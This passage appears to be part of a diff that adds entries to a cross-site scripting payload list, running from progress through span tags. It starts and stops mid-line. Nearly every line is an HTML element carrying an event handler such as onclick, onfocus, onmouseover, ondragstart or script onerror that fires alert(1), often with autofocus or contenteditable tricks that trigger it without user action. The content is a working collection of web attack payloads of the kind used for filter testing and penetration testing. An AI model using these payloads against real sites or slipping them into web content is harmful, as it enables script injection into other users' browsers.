draggable="true" ondragstart="alert(1)">test</progress> +<progress id=x tabindex=1 onactivate=alert(1)></progress> +<progress id=x tabindex=1 onbeforeactivate=alert(1)></progress> +<progress id=x tabindex=1 onbeforedeactivate=alert(1)></progress><input autofocus> +<progress id=x tabindex=1 ondeactivate=alert(1)></progress><input id=y autofocus> +<progress id=x tabindex=1 onfocus=alert(1)></progress> +<progress id=x tabindex=1 onfocusin=alert(1)></progress> +<progress onbeforecopy="alert(1)" contenteditable>test</progress> +<progress onbeforecut="alert(1)" contenteditable>test</progress> +<progress onbeforepaste="alert(1)" contenteditable>test</progress> +<progress onblur=alert(1) tabindex=1 id=x></progress><input autofocus> +<progress onclick="alert(1)">test</progress> +<progress oncontextmenu="alert(1)">test</progress> +<progress oncopy="alert(1)" contenteditable>test</progress> +<progress oncut="alert(1)" contenteditable>test</progress> +<progress ondblclick="alert(1)">test</progress> +<progress onfocusout=alert(1) tabindex=1 id=x></progress><input autofocus> +<progress onkeydown="alert(1)" contenteditable>test</progress> +<progress onkeypress="alert(1)" contenteditable>test</progress> +<progress onkeyup="alert(1)" contenteditable>test</progress> +<progress onmousedown="alert(1)">test</progress> +<progress onmouseenter="alert(1)">test</progress> +<progress onmouseleave="alert(1)">test</progress> +<progress onmousemove="alert(1)">test</progress> +<progress onmouseout="alert(1)">test</progress> +<progress onmouseover="alert(1)">test</progress> +<progress onmouseup="alert(1)">test</progress> +<progress onpaste="alert(1)" contenteditable>test</progress> +<q draggable="true" ondrag="alert(1)">test</q> +<q draggable="true" ondragend="alert(1)">test</q> +<q draggable="true" ondragenter="alert(1)">test</q> +<q draggable="true" ondragleave="alert(1)">test</q> +<q draggable="true" ondragstart="alert(1)">test</q> +<q id=x tabindex=1 onactivate=alert(1)></q> +<q id=x tabindex=1 onbeforeactivate=alert(1)></q> +<q id=x tabindex=1 onbeforedeactivate=alert(1)></q><input autofocus> +<q id=x tabindex=1 ondeactivate=alert(1)></q><input id=y autofocus> +<q id=x tabindex=1 onfocus=alert(1)></q> +<q id=x tabindex=1 onfocusin=alert(1)></q> +<q onbeforecopy="alert(1)" contenteditable>test</q> +<q onbeforecut="alert(1)" contenteditable>test</q> +<q onbeforepaste="alert(1)" contenteditable>test</q> +<q onblur=alert(1) tabindex=1 id=x></q><input autofocus> +<q onclick="alert(1)">test</q> +<q oncontextmenu="alert(1)">test</q> +<q oncopy="alert(1)" contenteditable>test</q> +<q oncut="alert(1)" contenteditable>test</q> +<q ondblclick="alert(1)">test</q> +<q onfocusout=alert(1) tabindex=1 id=x></q><input autofocus> +<q onkeydown="alert(1)" contenteditable>test</q> +<q onkeypress="alert(1)" contenteditable>test</q> +<q onkeyup="alert(1)" contenteditable>test</q> +<q onmousedown="alert(1)">test</q> +<q onmouseenter="alert(1)">test</q> +<q onmouseleave="alert(1)">test</q> +<q onmousemove="alert(1)">test</q> +<q onmouseout="alert(1)">test</q> +<q onmouseover="alert(1)">test</q> +<q onmouseup="alert(1)">test</q> +<q onpaste="alert(1)" contenteditable>test</q> +<rb draggable="true" ondrag="alert(1)">test</rb> +<rb draggable="true" ondragend="alert(1)">test</rb> +<rb draggable="true" ondragenter="alert(1)">test</rb> +<rb draggable="true" ondragleave="alert(1)">test</rb> +<rb draggable="true" ondragstart="alert(1)">test</rb> +<rb id=x tabindex=1 onactivate=alert(1)></rb> +<rb id=x tabindex=1 onbeforeactivate=alert(1)></rb> +<rb id=x tabindex=1 onbeforedeactivate=alert(1)></rb><input autofocus> +<rb id=x tabindex=1 ondeactivate=alert(1)></rb><input id=y autofocus> +<rb id=x tabindex=1 onfocus=alert(1)></rb> +<rb id=x tabindex=1 onfocusin=alert(1)></rb> +<rb onbeforecopy="alert(1)" contenteditable>test</rb> +<rb onbeforecut="alert(1)" contenteditable>test</rb> +<rb onbeforepaste="alert(1)" contenteditable>test</rb> +<rb onblur=alert(1) tabindex=1 id=x></rb><input autofocus> +<rb onclick="alert(1)">test</rb> +<rb oncontextmenu="alert(1)">test</rb> +<rb oncopy="alert(1)" contenteditable>test</rb> +<rb oncut="alert(1)" contenteditable>test</rb> +<rb ondblclick="alert(1)">test</rb> +<rb onfocusout=alert(1) tabindex=1 id=x></rb><input autofocus> +<rb onkeydown="alert(1)" contenteditable>test</rb> +<rb onkeypress="alert(1)" contenteditable>test</rb> +<rb onkeyup="alert(1)" contenteditable>test</rb> +<rb onmousedown="alert(1)">test</rb> +<rb onmouseenter="alert(1)">test</rb> +<rb onmouseleave="alert(1)">test</rb> +<rb onmousemove="alert(1)">test</rb> +<rb onmouseout="alert(1)">test</rb> +<rb onmouseover="alert(1)">test</rb> +<rb onmouseup="alert(1)">test</rb> +<rb onpaste="alert(1)" contenteditable>test</rb> +<rp draggable="true" ondrag="alert(1)">test</rp> +<rp draggable="true" ondragend="alert(1)">test</rp> +<rp draggable="true" ondragenter="alert(1)">test</rp> +<rp draggable="true" ondragleave="alert(1)">test</rp> +<rp draggable="true" ondragstart="alert(1)">test</rp> +<rp id=x tabindex=1 onactivate=alert(1)></rp> +<rp id=x tabindex=1 onbeforeactivate=alert(1)></rp> +<rp id=x tabindex=1 onbeforedeactivate=alert(1)></rp><input autofocus> +<rp id=x tabindex=1 ondeactivate=alert(1)></rp><input id=y autofocus> +<rp id=x tabindex=1 onfocus=alert(1)></rp> +<rp id=x tabindex=1 onfocusin=alert(1)></rp> +<rp onbeforecopy="alert(1)" contenteditable>test</rp> +<rp onbeforecut="alert(1)" contenteditable>test</rp> +<rp onbeforepaste="alert(1)" contenteditable>test</rp> +<rp onblur=alert(1) tabindex=1 id=x></rp><input autofocus> +<rp onclick="alert(1)">test</rp> +<rp oncontextmenu="alert(1)">test</rp> +<rp oncopy="alert(1)" contenteditable>test</rp> +<rp oncut="alert(1)" contenteditable>test</rp> +<rp ondblclick="alert(1)">test</rp> +<rp onfocusout=alert(1) tabindex=1 id=x></rp><input autofocus> +<rp onkeydown="alert(1)" contenteditable>test</rp> +<rp onkeypress="alert(1)" contenteditable>test</rp> +<rp onkeyup="alert(1)" contenteditable>test</rp> +<rp onmousedown="alert(1)">test</rp> +<rp onmouseenter="alert(1)">test</rp> +<rp onmouseleave="alert(1)">test</rp> +<rp onmousemove="alert(1)">test</rp> +<rp onmouseout="alert(1)">test</rp> +<rp onmouseover="alert(1)">test</rp> +<rp onmouseup="alert(1)">test</rp> +<rp onpaste="alert(1)" contenteditable>test</rp> +<rt draggable="true" ondrag="alert(1)">test</rt> +<rt draggable="true" ondragend="alert(1)">test</rt> +<rt draggable="true" ondragenter="alert(1)">test</rt> +<rt draggable="true" ondragleave="alert(1)">test</rt> +<rt draggable="true" ondragstart="alert(1)">test</rt> +<rt id=x tabindex=1 onactivate=alert(1)></rt> +<rt id=x tabindex=1 onbeforeactivate=alert(1)></rt> +<rt id=x tabindex=1 onbeforedeactivate=alert(1)></rt><input autofocus> +<rt id=x tabindex=1 ondeactivate=alert(1)></rt><input id=y autofocus> +<rt id=x tabindex=1 onfocus=alert(1)></rt> +<rt id=x tabindex=1 onfocusin=alert(1)></rt> +<rt onbeforecopy="alert(1)" contenteditable>test</rt> +<rt onbeforecut="alert(1)" contenteditable>test</rt> +<rt onbeforepaste="alert(1)" contenteditable>test</rt> +<rt onblur=alert(1) tabindex=1 id=x></rt><input autofocus> +<rt onclick="alert(1)">test</rt> +<rt oncontextmenu="alert(1)">test</rt> +<rt oncopy="alert(1)" contenteditable>test</rt> +<rt oncut="alert(1)" contenteditable>test</rt> +<rt ondblclick="alert(1)">test</rt> +<rt onfocusout=alert(1) tabindex=1 id=x></rt><input autofocus> +<rt onkeydown="alert(1)" contenteditable>test</rt> +<rt onkeypress="alert(1)" contenteditable>test</rt> +<rt onkeyup="alert(1)" contenteditable>test</rt> +<rt onmousedown="alert(1)">test</rt> +<rt onmouseenter="alert(1)">test</rt> +<rt onmouseleave="alert(1)">test</rt> +<rt onmousemove="alert(1)">test</rt> +<rt onmouseout="alert(1)">test</rt> +<rt onmouseover="alert(1)">test</rt> +<rt onmouseup="alert(1)">test</rt> +<rt onpaste="alert(1)" contenteditable>test</rt> +<rtc draggable="true" ondrag="alert(1)">test</rtc> +<rtc draggable="true" ondragend="alert(1)">test</rtc> +<rtc draggable="true" ondragenter="alert(1)">test</rtc> +<rtc draggable="true" ondragleave="alert(1)">test</rtc> +<rtc draggable="true" ondragstart="alert(1)">test</rtc> +<rtc id=x tabindex=1 onactivate=alert(1)></rtc> +<rtc id=x tabindex=1 onbeforeactivate=alert(1)></rtc> +<rtc id=x tabindex=1 onbeforedeactivate=alert(1)></rtc><input autofocus> +<rtc id=x tabindex=1 ondeactivate=alert(1)></rtc><input id=y autofocus> +<rtc id=x tabindex=1 onfocus=alert(1)></rtc> +<rtc id=x tabindex=1 onfocusin=alert(1)></rtc> +<rtc onbeforecopy="alert(1)" contenteditable>test</rtc> +<rtc onbeforecut="alert(1)" contenteditable>test</rtc> +<rtc onbeforepaste="alert(1)" contenteditable>test</rtc> +<rtc onblur=alert(1) tabindex=1 id=x></rtc><input autofocus> +<rtc onclick="alert(1)">test</rtc> +<rtc oncontextmenu="alert(1)">test</rtc> +<rtc oncopy="alert(1)" contenteditable>test</rtc> +<rtc oncut="alert(1)" contenteditable>test</rtc> +<rtc ondblclick="alert(1)">test</rtc> +<rtc onfocusout=alert(1) tabindex=1 id=x></rtc><input autofocus> +<rtc onkeydown="alert(1)" contenteditable>test</rtc> +<rtc onkeypress="alert(1)" contenteditable>test</rtc> +<rtc onkeyup="alert(1)" contenteditable>test</rtc> +<rtc onmousedown="alert(1)">test</rtc> +<rtc onmouseenter="alert(1)">test</rtc> +<rtc onmouseleave="alert(1)">test</rtc> +<rtc onmousemove="alert(1)">test</rtc> +<rtc onmouseout="alert(1)">test</rtc> +<rtc onmouseover="alert(1)">test</rtc> +<rtc onmouseup="alert(1)">test</rtc> +<rtc onpaste="alert(1)" contenteditable>test</rtc> +<ruby draggable="true" ondrag="alert(1)">test</ruby> +<ruby draggable="true" ondragend="alert(1)">test</ruby> +<ruby draggable="true" ondragenter="alert(1)">test</ruby> +<ruby draggable="true" ondragleave="alert(1)">test</ruby> +<ruby draggable="true" ondragstart="alert(1)">test</ruby> +<ruby id=x tabindex=1 onactivate=alert(1)></ruby> +<ruby id=x tabindex=1 onbeforeactivate=alert(1)></ruby> +<ruby id=x tabindex=1 onbeforedeactivate=alert(1)></ruby><input autofocus> +<ruby id=x tabindex=1 ondeactivate=alert(1)></ruby><input id=y autofocus> +<ruby id=x tabindex=1 onfocus=alert(1)></ruby> +<ruby id=x tabindex=1 onfocusin=alert(1)></ruby> +<ruby onbeforecopy="alert(1)" contenteditable>test</ruby> +<ruby onbeforecut="alert(1)" contenteditable>test</ruby> +<ruby onbeforepaste="alert(1)" contenteditable>test</ruby> +<ruby onblur=alert(1) tabindex=1 id=x></ruby><input autofocus> +<ruby onclick="alert(1)">test</ruby> +<ruby oncontextmenu="alert(1)">test</ruby> +<ruby oncopy="alert(1)" contenteditable>test</ruby> +<ruby oncut="alert(1)" contenteditable>test</ruby> +<ruby ondblclick="alert(1)">test</ruby> +<ruby onfocusout=alert(1) tabindex=1 id=x></ruby><input autofocus> +<ruby onkeydown="alert(1)" contenteditable>test</ruby> +<ruby onkeypress="alert(1)" contenteditable>test</ruby> +<ruby onkeyup="alert(1)" contenteditable>test</ruby> +<ruby onmousedown="alert(1)">test</ruby> +<ruby onmouseenter="alert(1)">test</ruby> +<ruby onmouseleave="alert(1)">test</ruby> +<ruby onmousemove="alert(1)">test</ruby> +<ruby onmouseout="alert(1)">test</ruby> +<ruby onmouseover="alert(1)">test</ruby> +<ruby onmouseup="alert(1)">test</ruby> +<ruby onpaste="alert(1)" contenteditable>test</ruby> +<s draggable="true" ondrag="alert(1)">test</s> +<s draggable="true" ondragend="alert(1)">test</s> +<s draggable="true" ondragenter="alert(1)">test</s> +<s draggable="true" ondragleave="alert(1)">test</s> +<s draggable="true" ondragstart="alert(1)">test</s> +<s id=x tabindex=1 onactivate=alert(1)></s> +<s id=x tabindex=1 onbeforeactivate=alert(1)></s> +<s id=x tabindex=1 onbeforedeactivate=alert(1)></s><input autofocus> +<s id=x tabindex=1 ondeactivate=alert(1)></s><input id=y autofocus> +<s id=x tabindex=1 onfocus=alert(1)></s> +<s id=x tabindex=1 onfocusin=alert(1)></s> +<s onbeforecopy="alert(1)" contenteditable>test</s> +<s onbeforecut="alert(1)" contenteditable>test</s> +<s onbeforepaste="alert(1)" contenteditable>test</s> +<s onblur=alert(1) tabindex=1 id=x></s><input autofocus> +<s onclick="alert(1)">test</s> +<s oncontextmenu="alert(1)">test</s> +<s oncopy="alert(1)" contenteditable>test</s> +<s oncut="alert(1)" contenteditable>test</s> +<s ondblclick="alert(1)">test</s> +<s onfocusout=alert(1) tabindex=1 id=x></s><input autofocus> +<s onkeydown="alert(1)" contenteditable>test</s> +<s onkeypress="alert(1)" contenteditable>test</s> +<s onkeyup="alert(1)" contenteditable>test</s> +<s onmousedown="alert(1)">test</s> +<s onmouseenter="alert(1)">test</s> +<s onmouseleave="alert(1)">test</s> +<s onmousemove="alert(1)">test</s> +<s onmouseout="alert(1)">test</s> +<s onmouseover="alert(1)">test</s> +<s onmouseup="alert(1)">test</s> +<s onpaste="alert(1)" contenteditable>test</s> +<samp draggable="true" ondrag="alert(1)">test</samp> +<samp draggable="true" ondragend="alert(1)">test</samp> +<samp draggable="true" ondragenter="alert(1)">test</samp> +<samp draggable="true" ondragleave="alert(1)">test</samp> +<samp draggable="true" ondragstart="alert(1)">test</samp> +<samp id=x tabindex=1 onactivate=alert(1)></samp> +<samp id=x tabindex=1 onbeforeactivate=alert(1)></samp> +<samp id=x tabindex=1 onbeforedeactivate=alert(1)></samp><input autofocus> +<samp id=x tabindex=1 ondeactivate=alert(1)></samp><input id=y autofocus> +<samp id=x tabindex=1 onfocus=alert(1)></samp> +<samp id=x tabindex=1 onfocusin=alert(1)></samp> +<samp onbeforecopy="alert(1)" contenteditable>test</samp> +<samp onbeforecut="alert(1)" contenteditable>test</samp> +<samp onbeforepaste="alert(1)" contenteditable>test</samp> +<samp onblur=alert(1) tabindex=1 id=x></samp><input autofocus> +<samp onclick="alert(1)">test</samp> +<samp oncontextmenu="alert(1)">test</samp> +<samp oncopy="alert(1)" contenteditable>test</samp> +<samp oncut="alert(1)" contenteditable>test</samp> +<samp ondblclick="alert(1)">test</samp> +<samp onfocusout=alert(1) tabindex=1 id=x></samp><input autofocus> +<samp onkeydown="alert(1)" contenteditable>test</samp> +<samp onkeypress="alert(1)" contenteditable>test</samp> +<samp onkeyup="alert(1)" contenteditable>test</samp> +<samp onmousedown="alert(1)">test</samp> +<samp onmouseenter="alert(1)">test</samp> +<samp onmouseleave="alert(1)">test</samp> +<samp onmousemove="alert(1)">test</samp> +<samp onmouseout="alert(1)">test</samp> +<samp onmouseover="alert(1)">test</samp> +<samp onmouseup="alert(1)">test</samp> +<samp onpaste="alert(1)" contenteditable>test</samp> +<script draggable="true" ondrag="alert(1)">test</script> +<script draggable="true" ondragend="alert(1)">test</script> +<script draggable="true" ondragenter="alert(1)">test</script> +<script draggable="true" ondragleave="alert(1)">test</script> +<script draggable="true" ondragstart="alert(1)">test</script> +<script id=x tabindex=1 onactivate=alert(1)></script> +<script id=x tabindex=1 onbeforeactivate=alert(1)></script> +<script id=x tabindex=1 onbeforedeactivate=alert(1)></script><input autofocus> +<script id=x tabindex=1 ondeactivate=alert(1)></script><input id=y autofocus> +<script id=x tabindex=1 onfocus=alert(1)></script> +<script id=x tabindex=1 onfocusin=alert(1)></script> +<script onbeforecopy="alert(1)" contenteditable>test</script> +<script onbeforecut="alert(1)" contenteditable>test</script> +<script onbeforepaste="alert(1)" contenteditable>test</script> +<script onblur=alert(1) tabindex=1 id=x></script><input autofocus> +<script onclick="alert(1)">test</script> +<script oncontextmenu="alert(1)">test</script> +<script oncopy="alert(1)" contenteditable>test</script> +<script oncut="alert(1)" contenteditable>test</script> +<script ondblclick="alert(1)">test</script> +<script onerror=alert(1) src=/></script> +<script onfocusout=alert(1) tabindex=1 id=x></script><input autofocus> +<script onkeydown="alert(1)" contenteditable>test</script> +<script onkeypress="alert(1)" contenteditable>test</script> +<script onkeyup="alert(1)" contenteditable>test</script> +<script onload=alert(1) src=validjs.js></script> +<script onmousedown="alert(1)">test</script> +<script onmouseenter="alert(1)">test</script> +<script onmouseleave="alert(1)">test</script> +<script onmousemove="alert(1)">test</script> +<script onmouseout="alert(1)">test</script> +<script onmouseover="alert(1)">test</script> +<script onmouseup="alert(1)">test</script> +<script onpaste="alert(1)" contenteditable>test</script> +<script onreadystatechange=alert(1)></script> +<section draggable="true" ondrag="alert(1)">test</section> +<section draggable="true" ondragend="alert(1)">test</section> +<section draggable="true" ondragenter="alert(1)">test</section> +<section draggable="true" ondragleave="alert(1)">test</section> +<section draggable="true" ondragstart="alert(1)">test</section> +<section id=x tabindex=1 onactivate=alert(1)></section> +<section id=x tabindex=1 onbeforeactivate=alert(1)></section> +<section id=x tabindex=1 onbeforedeactivate=alert(1)></section><input autofocus> +<section id=x tabindex=1 ondeactivate=alert(1)></section><input id=y autofocus> +<section id=x tabindex=1 onfocus=alert(1)></section> +<section id=x tabindex=1 onfocusin=alert(1)></section> +<section onbeforecopy="alert(1)" contenteditable>test</section> +<section onbeforecut="alert(1)" contenteditable>test</section> +<section onbeforepaste="alert(1)" contenteditable>test</section> +<section onblur=alert(1) tabindex=1 id=x></section><input autofocus> +<section onclick="alert(1)">test</section> +<section oncontextmenu="alert(1)">test</section> +<section oncopy="alert(1)" contenteditable>test</section> +<section oncut="alert(1)" contenteditable>test</section> +<section ondblclick="alert(1)">test</section> +<section onfocusout=alert(1) tabindex=1 id=x></section><input autofocus> +<section onkeydown="alert(1)" contenteditable>test</section> +<section onkeypress="alert(1)" contenteditable>test</section> +<section onkeyup="alert(1)" contenteditable>test</section> +<section onmousedown="alert(1)">test</section> +<section onmouseenter="alert(1)">test</section> +<section onmouseleave="alert(1)">test</section> +<section onmousemove="alert(1)">test</section> +<section onmouseout="alert(1)">test</section> +<section onmouseover="alert(1)">test</section> +<section onmouseup="alert(1)">test</section> +<section onpaste="alert(1)" contenteditable>test</section> +<select autofocus onfocus=alert(1)> +<select autofocus onfocusin=alert(1)> +<select draggable="true" ondrag="alert(1)">test</select> +<select draggable="true" ondragend="alert(1)">test</select> +<select draggable="true" ondragenter="alert(1)">test</select> +<select draggable="true" ondragleave="alert(1)">test</select> +<select draggable="true" ondragstart="alert(1)">test</select> +<select id=x tabindex=1 onactivate=alert(1)></select> +<select id=x tabindex=1 onbeforeactivate=alert(1)></select> +<select id=x tabindex=1 onbeforedeactivate=alert(1)></select><input autofocus> +<select id=x tabindex=1 ondeactivate=alert(1)></select><input id=y autofocus> +<select onbeforecopy="alert(1)" contenteditable>test</select> +<select onbeforecut="alert(1)" contenteditable>test</select> +<select onbeforepaste="alert(1)" contenteditable>test</select> +<select onblur=alert(1) id=x></select><input autofocus> +<select onchange=alert(1)><option>change me</option><option>XSS</option></select> +<select onclick="alert(1)">test</select> +<select oncontextmenu="alert(1)">test</select> +<select oncopy="alert(1)" contenteditable>test</select> +<select oncut="alert(1)" contenteditable>test</select> +<select ondblclick="alert(1)">test</select> +<select onfocusout=alert(1) id=x></select><input autofocus> +<select onkeydown="alert(1)" contenteditable>test</select> +<select onkeypress="alert(1)" contenteditable>test</select> +<select onkeyup="alert(1)" contenteditable>test</select> +<select onmousedown="alert(1)">test</select> +<select onmouseenter="alert(1)">test</select> +<select onmouseleave="alert(1)">test</select> +<select onmousemove="alert(1)">test</select> +<select onmouseout="alert(1)">test</select> +<select onmouseover="alert(1)">test</select> +<select onmouseup="alert(1)">test</select> +<select onpaste="alert(1)" contenteditable>test</select> +<shadow draggable="true" ondrag="alert(1)">test</shadow> +<shadow draggable="true" ondragend="alert(1)">test</shadow> +<shadow draggable="true" ondragenter="alert(1)">test</shadow> +<shadow draggable="true" ondragleave="alert(1)">test</shadow> +<shadow draggable="true" ondragstart="alert(1)">test</shadow> +<shadow id=x tabindex=1 onactivate=alert(1)></shadow> +<shadow id=x tabindex=1 onbeforeactivate=alert(1)></shadow> +<shadow id=x tabindex=1 onbeforedeactivate=alert(1)></shadow><input autofocus> +<shadow id=x tabindex=1 ondeactivate=alert(1)></shadow><input id=y autofocus> +<shadow id=x tabindex=1 onfocus=alert(1)></shadow> +<shadow id=x tabindex=1 onfocusin=alert(1)></shadow> +<shadow onbeforecopy="alert(1)" contenteditable>test</shadow> +<shadow onbeforecut="alert(1)" contenteditable>test</shadow> +<shadow onbeforepaste="alert(1)" contenteditable>test</shadow> +<shadow onblur=alert(1) tabindex=1 id=x></shadow><input autofocus> +<shadow onclick="alert(1)">test</shadow> +<shadow oncontextmenu="alert(1)">test</shadow> +<shadow oncopy="alert(1)" contenteditable>test</shadow> +<shadow oncut="alert(1)" contenteditable>test</shadow> +<shadow ondblclick="alert(1)">test</shadow> +<shadow onfocusout=alert(1) tabindex=1 id=x></shadow><input autofocus> +<shadow onkeydown="alert(1)" contenteditable>test</shadow> +<shadow onkeypress="alert(1)" contenteditable>test</shadow> +<shadow onkeyup="alert(1)" contenteditable>test</shadow> +<shadow onmousedown="alert(1)">test</shadow> +<shadow onmouseenter="alert(1)">test</shadow> +<shadow onmouseleave="alert(1)">test</shadow> +<shadow onmousemove="alert(1)">test</shadow> +<shadow onmouseout="alert(1)">test</shadow> +<shadow onmouseover="alert(1)">test</shadow> +<shadow onmouseup="alert(1)">test</shadow> +<shadow onpaste="alert(1)" contenteditable>test</shadow> +<slot draggable="true" ondrag="alert(1)">test</slot> +<slot draggable="true" ondragend="alert(1)">test</slot> +<slot draggable="true" ondragenter="alert(1)">test</slot> +<slot draggable="true" ondragleave="alert(1)">test</slot> +<slot draggable="true" ondragstart="alert(1)">test</slot> +<slot id=x tabindex=1 onactivate=alert(1)></slot> +<slot id=x tabindex=1 onbeforeactivate=alert(1)></slot> +<slot id=x tabindex=1 onbeforedeactivate=alert(1)></slot><input autofocus> +<slot id=x tabindex=1 ondeactivate=alert(1)></slot><input id=y autofocus> +<slot id=x tabindex=1 onfocus=alert(1)></slot> +<slot id=x tabindex=1 onfocusin=alert(1)></slot> +<slot onbeforecopy="alert(1)" contenteditable>test</slot> +<slot onbeforecut="alert(1)" contenteditable>test</slot> +<slot onbeforepaste="alert(1)" contenteditable>test</slot> +<slot onblur=alert(1) tabindex=1 id=x></slot><input autofocus> +<slot onclick="alert(1)">test</slot> +<slot oncontextmenu="alert(1)">test</slot> +<slot oncopy="alert(1)" contenteditable>test</slot> +<slot oncut="alert(1)" contenteditable>test</slot> +<slot ondblclick="alert(1)">test</slot> +<slot onfocusout=alert(1) tabindex=1 id=x></slot><input autofocus> +<slot onkeydown="alert(1)" contenteditable>test</slot> +<slot onkeypress="alert(1)" contenteditable>test</slot> +<slot onkeyup="alert(1)" contenteditable>test</slot> +<slot onmousedown="alert(1)">test</slot> +<slot onmouseenter="alert(1)">test</slot> +<slot onmouseleave="alert(1)">test</slot> +<slot onmousemove="alert(1)">test</slot> +<slot onmouseout="alert(1)">test</slot> +<slot onmouseover="alert(1)">test</slot> +<slot onmouseup="alert(1)">test</slot> +<slot onpaste="alert(1)" contenteditable>test</slot> +<small draggable="true" ondrag="alert(1)">test</small> +<small draggable="true" ondragend="alert(1)">test</small> +<small draggable="true" ondragenter="alert(1)">test</small> +<small draggable="true" ondragleave="alert(1)">test</small> +<small draggable="true" ondragstart="alert(1)">test</small> +<small id=x tabindex=1 onactivate=alert(1)></small> +<small id=x tabindex=1 onbeforeactivate=alert(1)></small> +<small id=x tabindex=1 onbeforedeactivate=alert(1)></small><input autofocus> +<small id=x tabindex=1 ondeactivate=alert(1)></small><input id=y autofocus> +<small id=x tabindex=1 onfocus=alert(1)></small> +<small id=x tabindex=1 onfocusin=alert(1)></small> +<small onbeforecopy="alert(1)" contenteditable>test</small> +<small onbeforecut="alert(1)" contenteditable>test</small> +<small onbeforepaste="alert(1)" contenteditable>test</small> +<small onblur=alert(1) tabindex=1 id=x></small><input autofocus> +<small onclick="alert(1)">test</small> +<small oncontextmenu="alert(1)">test</small> +<small oncopy="alert(1)" contenteditable>test</small> +<small oncut="alert(1)" contenteditable>test</small> +<small ondblclick="alert(1)">test</small> +<small onfocusout=alert(1) tabindex=1 id=x></small><input autofocus> +<small onkeydown="alert(1)" contenteditable>test</small> +<small onkeypress="alert(1)" contenteditable>test</small> +<small onkeyup="alert(1)" contenteditable>test</small> +<small onmousedown="alert(1)">test</small> +<small onmouseenter="alert(1)">test</small> +<small onmouseleave="alert(1)">test</small> +<small onmousemove="alert(1)">test</small> +<small onmouseout="alert(1)">test</small> +<small onmouseover="alert(1)">test</small> +<small onmouseup="alert(1)">test</small> +<small onpaste="alert(1)" contenteditable>test</small> +<source draggable="true" ondrag="alert(1)">test</source> +<source draggable="true" ondragend="alert(1)">test</source> +<source draggable="true" ondragenter="alert(1)">test</source> +<source draggable="true" ondragleave="alert(1)">test</source> +<source draggable="true" ondragstart="alert(1)">test</source> +<source id=x tabindex=1 onactivate=alert(1)></source> +<source id=x tabindex=1 onbeforeactivate=alert(1)></source> +<source id=x tabindex=1 onbeforedeactivate=alert(1)></source><input autofocus> +<source id=x tabindex=1 ondeactivate=alert(1)></source><input id=y autofocus> +<source id=x tabindex=1 onfocus=alert(1)></source> +<source id=x tabindex=1 onfocusin=alert(1)></source> +<source onbeforecopy="alert(1)" contenteditable>test</source> +<source onbeforecut="alert(1)" contenteditable>test</source> +<source onbeforepaste="alert(1)" contenteditable>test</source> +<source onblur=alert(1) tabindex=1 id=x></source><input autofocus> +<source onclick="alert(1)">test</source> +<source oncontextmenu="alert(1)">test</source> +<source oncopy="alert(1)" contenteditable>test</source> +<source oncut="alert(1)" contenteditable>test</source> +<source ondblclick="alert(1)">test</source> +<source onfocusout=alert(1) tabindex=1 id=x></source><input autofocus> +<source onkeydown="alert(1)" contenteditable>test</source> +<source onkeypress="alert(1)" contenteditable>test</source> +<source onkeyup="alert(1)" contenteditable>test</source> +<source onmousedown="alert(1)">test</source> +<source onmouseenter="alert(1)">test</source> +<source onmouseleave="alert(1)">test</source> +<source onmousemove="alert(1)">test</source> +<source onmouseout="alert(1)">test</source> +<source onmouseover="alert(1)">test</source> +<source onmouseup="alert(1)">test</source> +<source onpaste="alert(1)" contenteditable>test</source> +<spacer draggable="true" ondrag="alert(1)">test</spacer> +<spacer draggable="true" ondragend="alert(1)">test</spacer> +<spacer draggable="true" ondragenter="alert(1)">test</spacer> +<spacer draggable="true" ondragleave="alert(1)">test</spacer> +<spacer draggable="true" ondragstart="alert(1)">test</spacer> +<spacer id=x tabindex=1 onactivate=alert(1)></spacer> +<spacer id=x tabindex=1 onbeforeactivate=alert(1)></spacer> +<spacer id=x tabindex=1 onbeforedeactivate=alert(1)></spacer><input autofocus> +<spacer id=x tabindex=1 ondeactivate=alert(1)></spacer><input id=y autofocus> +<spacer id=x tabindex=1 onfocus=alert(1)></spacer> +<spacer id=x tabindex=1 onfocusin=alert(1)></spacer> +<spacer onbeforecopy="alert(1)" contenteditable>test</spacer> +<spacer onbeforecut="alert(1)" contenteditable>test</spacer> +<spacer onbeforepaste="alert(1)" contenteditable>test</spacer> +<spacer onblur=alert(1) tabindex=1 id=x></spacer><input autofocus> +<spacer onclick="alert(1)">test</spacer> +<spacer oncontextmenu="alert(1)">test</spacer> +<spacer oncopy="alert(1)" contenteditable>test</spacer> +<spacer oncut="alert(1)" contenteditable>test</spacer> +<spacer ondblclick="alert(1)">test</spacer> +<spacer onfocusout=alert(1) tabindex=1 id=x></spacer><input autofocus> +<spacer onkeydown="alert(1)" contenteditable>test</spacer> +<spacer onkeypress="alert(1)" contenteditable>test</spacer> +<spacer onkeyup="alert(1)" contenteditable>test</spacer> +<spacer onmousedown="alert(1)">test</spacer> +<spacer onmouseenter="alert(1)">test</spacer> +<spacer onmouseleave="alert(1)">test</spacer> +<spacer onmousemove="alert(1)">test</spacer> +<spacer onmouseout="alert(1)">test</spacer> +<spacer onmouseover="alert(1)">test</spacer> +<spacer onmouseup="alert(1)">test</spacer> +<spacer onpaste="alert(1)" contenteditable>test</spacer> +<span draggable="true" ondrag="alert(1)">test</span> +<span draggable="true" ondragend="alert(1)">test</span> +<span draggable="true" ondragenter="alert(1)">test</span> +<span draggable="true" ondragleave="alert(1)">test</span> +<span draggable="true" ondragstart="alert(1)">test</span> +<span id=x tabindex=1 onactivate=alert(1)></span> +<span id=x tabindex=1 onbeforeactivate=alert(1)></span> +<span id=x tabindex=1 onbeforedeactivate=alert(1)></span><input autofocus> +<span id=x tabindex=1 ondeactivate=alert(1)></span><input id=y autofocus> +<span id=x tabindex=1 onfocus=alert(1)></span> +<span id=x tabindex=1 onfocusin=alert(1)></span> +<span onbeforecopy="alert(1)" contenteditable>test</span> +<span onbeforecut="alert(1)" contenteditable>test</span> +<span onbeforepaste="alert(1)" contenteditable>test</span> +<span onblur=alert(1) tabindex=1 id=x></span><input autofocus> +<span onclick="alert(1)">test</span> +<span oncontextmenu="alert(1)">test</span> +<span oncopy="alert(1)" contenteditable>test</span> +<span oncut="alert(1)" contenteditable>test</span> +<span ondblclick="alert(1)">test</span> +<span onfocusout=alert(1) tabindex=1 id=x></span><input autofocus> +<span onkeydown="alert(1)" contenteditable>test</span> +<span onkeypress="alert(1)" contenteditable>test</span> +<span onkeyup="alert(1)" contenteditable>test</span> +<span onmousedown="alert(1)">test</span> +<span onmouseenter="alert(1)">test</span> +<span onmouseleave="alert(1)">test</span> +<span onmousemove="alert(1)">test</span> +<span onmouseout="alert(1)">test</span> +<span onmouseover="alert(1)">test</span> +<span 